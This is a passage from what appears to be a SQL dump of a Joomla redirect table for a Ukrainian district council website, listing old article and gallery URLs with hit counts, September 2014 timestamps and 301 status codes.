00:00:00',301),(3795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=en','','','',14,0,'2014-09-21 16:32:36','0000-00-00 00:00:00',301),(3796,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-21 16:33:15','0000-00-00 00:00:00',301),(3797,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-21 16:35:08','0000-00-00 00:00:00',301),(3798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-09-21 16:36:15','0000-00-00 00:00:00',301),(3799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-21 16:37:21','0000-00-00 00:00:00',301),(3800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-21 16:38:10','0000-00-00 00:00:00',301),(3801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46:--21122012&Itemid=85&lang=en','','','',2,0,'2014-09-21 16:39:24','0000-00-00 00:00:00',301),(3802,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 16:40:14','0000-00-00 00:00:00',301),(3803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=en','','','',3,0,'2014-09-21 16:41:33','0000-00-00 00:00:00',301),(3804,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-21 16:46:43','0000-00-00 00:00:00',301),(3805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-09-21 16:47:47','0000-00-00 00:00:00',301),(3806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 16:48:04','0000-00-00 00:00:00',301),(3807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 16:49:20','0000-00-00 00:00:00',301),(3808,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-21 16:50:25','0000-00-00 00:00:00',301),(3809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-21 16:54:19','0000-00-00 00:00:00',301),(3810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-21 16:56:11','0000-00-00 00:00:00',301),(3811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-21 16:56:45','0000-00-00 00:00:00',301),(3812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-21 17:03:40','0000-00-00 00:00:00',301),(3813,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=en','','','',2,0,'2014-09-21 17:08:37','0000-00-00 00:00:00',301),(3814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36&Itemid=70&lang=en','','','',11,0,'2014-09-21 17:09:19','0000-00-00 00:00:00',301),(3815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=en','','','',3,0,'2014-09-21 17:11:38','0000-00-00 00:00:00',301),(3816,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 17:21:24','0000-00-00 00:00:00',301),(3817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru','','','',3,0,'2014-09-21 17:30:21','0000-00-00 00:00:00',301),(3818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:-21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-21 17:30:50','0000-00-00 00:00:00',301),(3819,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-21 17:32:55','0000-00-00 00:00:00',301),(3820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54&Itemid=95&lang=en','','','',1,0,'2014-09-21 17:35:11','0000-00-00 00:00:00',301),(3821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51:--19072013-&Itemid=92&lang=en','','','',5,0,'2014-09-21 17:35:43','0000-00-00 00:00:00',301),(3822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-21 17:35:46','0000-00-00 00:00:00',301),(3823,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-21 17:38:32','0000-00-00 00:00:00',301),(3824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-21 17:39:12','0000-00-00 00:00:00',301),(3825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk&Itemid=','','','',4,0,'2014-09-21 17:40:14','0000-00-00 00:00:00',301),(3826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-21 17:40:16','0000-00-00 00:00:00',301),(3827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 17:40:17','0000-00-00 00:00:00',301),(3828,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=en','','','',1,0,'2014-09-21 17:40:22','0000-00-00 00:00:00',301),(3829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 17:40:28','0000-00-00 00:00:00',301),(3830,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-21 17:40:30','0000-00-00 00:00:00',301),(3831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-21 17:40:32','0000-00-00 00:00:00',301),(3832,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60:--11072014-&Itemid=108&lang=en','','','',4,0,'2014-09-21 17:40:42','0000-00-00 00:00:00',301),(3833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-21 17:41:11','0000-00-00 00:00:00',301),(3834,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-09-21 17:45:01','0000-00-00 00:00:00',301),(3835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-09-21 17:45:02','0000-00-00 00:00:00',301),(3836,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-21 17:45:06','0000-00-00 00:00:00',301),(3837,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-21 17:45:09','0000-00-00 00:00:00',301),(3838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-21 17:46:51','0000-00-00 00:00:00',301),(3839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 17:47:24','0000-00-00 00:00:00',301),(3840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru','','','',5,0,'2014-09-21 17:47:36','0000-00-00 00:00:00',301),(3841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk&Itemid=0','','','',4,0,'2014-09-21 17:48:03','0000-00-00 00:00:00',301),(3842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-21 17:48:10','0000-00-00 00:00:00',301),(3843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-21 17:48:49','0000-00-00 00:00:00',301),(3844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-21 17:52:16','0000-00-00 00:00:00',301),(3845,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-21 17:56:31','0000-00-00 00:00:00',301),(3846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-------2015-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',17,0,'2014-09-21 17:58:33','0000-00-00 00:00:00',301),(3847,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 17:58:49','0000-00-00 00:00:00',301),(3848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-21 18:00:44','0000-00-00 00:00:00',301),(3849,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=en','','','',3,0,'2014-09-21 18:00:47','0000-00-00 00:00:00',301),(3850,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 18:03:19','0000-00-00 00:00:00',301),(3851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-21 18:03:37','0000-00-00 00:00:00',301),(3852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=en','','','',5,0,'2014-09-21 18:05:49','0000-00-00 00:00:00',301),(3853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-09-21 18:06:25','0000-00-00 00:00:00',301),(3854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 18:09:24','0000-00-00 00:00:00',301),(3855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=ru&Itemid=','','','',5,0,'2014-09-21 18:12:42','0000-00-00 00:00:00',301),(3856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-21 18:20:58','0000-00-00 00:00:00',301),(3857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=uk','','','',8,0,'2014-09-21 18:23:14','0000-00-00 00:00:00',301),(3858,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-21 18:29:51','0000-00-00 00:00:00',301),(3859,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-21 18:32:51','0000-00-00 00:00:00',301),(3860,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 18:33:45','0000-00-00 00:00:00',301),(3861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-21 18:33:52','0000-00-00 00:00:00',301),(3862,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=en','','','',2,0,'2014-09-21 18:33:54','0000-00-00 00:00:00',301),(3863,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-21 18:35:55','0000-00-00 00:00:00',301),(3864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-21 18:38:30','0000-00-00 00:00:00',301),(3865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-21 18:43:51','0000-00-00 00:00:00',301),(3866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=uk','','','',4,0,'2014-09-21 18:44:56','0000-00-00 00:00:00',301),(3867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-21 18:45:05','0000-00-00 00:00:00',301),(3868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-21 18:46:59','0000-00-00 00:00:00',301),(3869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 18:47:01','0000-00-00 00:00:00',301),(3870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-09-21 18:47:17','0000-00-00 00:00:00',301),(3871,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru','','','',19,0,'2014-09-21 18:47:37','0000-00-00 00:00:00',301),(3872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 18:50:49','0000-00-00 00:00:00',301),(3873,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',3,0,'2014-09-21 18:51:13','0000-00-00 00:00:00',301),(3874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-21 18:52:24','0000-00-00 00:00:00',301),(3875,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-21 18:52:27','0000-00-00 00:00:00',301),(3876,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-21 18:52:28','0000-00-00 00:00:00',301),(3877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=uk','','','',7,0,'2014-09-21 18:52:30','0000-00-00 00:00:00',301),(3878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 18:52:38','0000-00-00 00:00:00',301),(3879,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-21 18:52:48','0000-00-00 00:00:00',301),(3880,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 18:54:16','0000-00-00 00:00:00',301),(3881,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru&Itemid=','','','',7,0,'2014-09-21 18:55:15','0000-00-00 00:00:00',301),(3882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51:--19072013-&Itemid=92&lang=en','','','',2,0,'2014-09-21 18:55:20','0000-00-00 00:00:00',301),(3883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-21 19:00:35','0000-00-00 00:00:00',301),(3884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-21 19:00:49','0000-00-00 00:00:00',301),(3885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-21 19:01:45','0000-00-00 00:00:00',301),(3886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-21 19:08:45','0000-00-00 00:00:00',301),(3887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',13,0,'2014-09-21 19:10:07','0000-00-00 00:00:00',301),(3888,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=en','','','',6,0,'2014-09-21 19:16:20','0000-00-00 00:00:00',301),(3889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-21 19:21:12','0000-00-00 00:00:00',301),(3890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:--qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',4,0,'2014-09-21 19:21:18','0000-00-00 00:00:00',301),(3891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-21 19:22:32','0000-00-00 00:00:00',301),(3892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49:--12042013-&Itemid=88&lang=en','','','',3,0,'2014-09-21 19:25:02','0000-00-00 00:00:00',301),(3893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=en','','','',3,0,'2014-09-21 19:25:08','0000-00-00 00:00:00',301),(3894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:---------------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-21 19:25:25','0000-00-00 00:00:00',301),(3895,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=uk','','','',4,0,'2014-09-21 19:25:40','0000-00-00 00:00:00',301),(3896,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk&Itemid=','','','',5,0,'2014-09-21 19:33:45','0000-00-00 00:00:00',301),(3897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-21 19:35:42','0000-00-00 00:00:00',301),(3898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-------&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-21 19:37:02','0000-00-00 00:00:00',301),(3899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-21 19:40:20','0000-00-00 00:00:00',301),(3900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-21 19:42:03','0000-00-00 00:00:00',301),(3901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-21 19:44:57','0000-00-00 00:00:00',301),(3902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=en','','','',6,0,'2014-09-21 19:45:28','0000-00-00 00:00:00',301),(3903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 19:48:08','0000-00-00 00:00:00',301),(3904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 19:49:17','0000-00-00 00:00:00',301),(3905,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk&Itemid=','','','',3,0,'2014-09-21 19:50:15','0000-00-00 00:00:00',301),(3906,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk&Itemid=0','','','',5,0,'2014-09-21 19:50:26','0000-00-00 00:00:00',301),(3907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=ru','','','',6,0,'2014-09-21 19:50:53','0000-00-00 00:00:00',301),(3908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-21 19:51:25','0000-00-00 00:00:00',301),(3909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59&Itemid=107&lang=uk','','','',5,0,'2014-09-21 19:52:18','0000-00-00 00:00:00',301),(3910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 19:54:04','0000-00-00 00:00:00',301),(3911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-21 19:57:08','0000-00-00 00:00:00',301),(3912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-21 19:59:14','0000-00-00 00:00:00',301),(3913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-21 20:00:07','0000-00-00 00:00:00',301),(3914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 20:00:12','0000-00-00 00:00:00',301),(3915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59&Itemid=107&lang=en','','','',8,0,'2014-09-21 20:00:25','0000-00-00 00:00:00',301),(3916,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en','','','',2,0,'2014-09-21 20:00:32','0000-00-00 00:00:00',301),(3917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54&Itemid=95&lang=en','','','',5,0,'2014-09-21 20:00:34','0000-00-00 00:00:00',301),(3918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-21 20:01:41','0000-00-00 00:00:00',301),(3919,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=en','','','',3,0,'2014-09-21 20:01:46','0000-00-00 00:00:00',301),(3920,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 20:03:05','0000-00-00 00:00:00',301),(3921,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-21 20:04:00','0000-00-00 00:00:00',301),(3922,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-09-21 20:04:38','0000-00-00 00:00:00',301),(3923,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-21 20:05:12','0000-00-00 00:00:00',301),(3924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:--------25--2013--464-l-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-21 20:09:10','0000-00-00 00:00:00',301),(3925,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-21 20:11:39','0000-00-00 00:00:00',301),(3926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-21 20:14:33','0000-00-00 00:00:00',301),(3927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=en','','','',13,0,'2014-09-21 20:36:21','0000-00-00 00:00:00',301),(3928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59&Itemid=107&lang=ru','','','',2,0,'2014-09-21 20:51:47','0000-00-00 00:00:00',301),(3929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-21 20:56:32','0000-00-00 00:00:00',301),(3930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-21 21:00:32','0000-00-00 00:00:00',301),(3931,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-21 21:10:03','0000-00-00 00:00:00',301),(3932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-21 21:11:31','0000-00-00 